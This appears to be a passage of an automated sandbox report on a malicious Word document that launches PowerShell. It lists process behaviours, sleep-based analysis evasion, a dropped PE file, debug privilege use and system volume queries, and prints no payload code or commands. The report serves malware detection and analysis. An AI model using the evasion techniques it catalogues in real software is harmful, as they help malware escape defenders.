Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5376 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2524 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1102 Jump to behavior
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 4838 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdGC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdBC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd>C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdKC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.psm1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterTeamMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Connect-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdFC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterTeamMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.cdxml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Test-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterRdma
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdOC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Rename-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: 2.0.0.0\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdGC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd)Set-VMNetworkAdapterFailoverConfiguration
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterVlan
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdIC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-VMNetworkAdapterAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.ni
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMScsiController
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VmNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdHC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.ni.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMScsiController
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Set-VmNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.563126115.00000000088CE000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterRdma
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Set-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Get-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapterVlan
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdBC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VmNetworkAdapterIsolation
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdGC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Set-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Disconnect-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd+Remove-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd)Get-VMNetworkAdapterFailoverConfiguration
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Add-VmNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd"Remove-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd(Add-VMNetworkAdapterRoutingDomainMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-VMNetworkAdapterAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdFC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-VMScsiController
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd<C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\*
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd"Remove-VMNetworkAdapterTeamMapping
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V8^
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zdJC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Remove-VMNetworkAdapter
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: zd:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.xaml
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Hyper-V.dll
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: Get-VMNetworkAdapterExtendedAcl
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp Binary or memory string: 1.1\Hyper-V

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
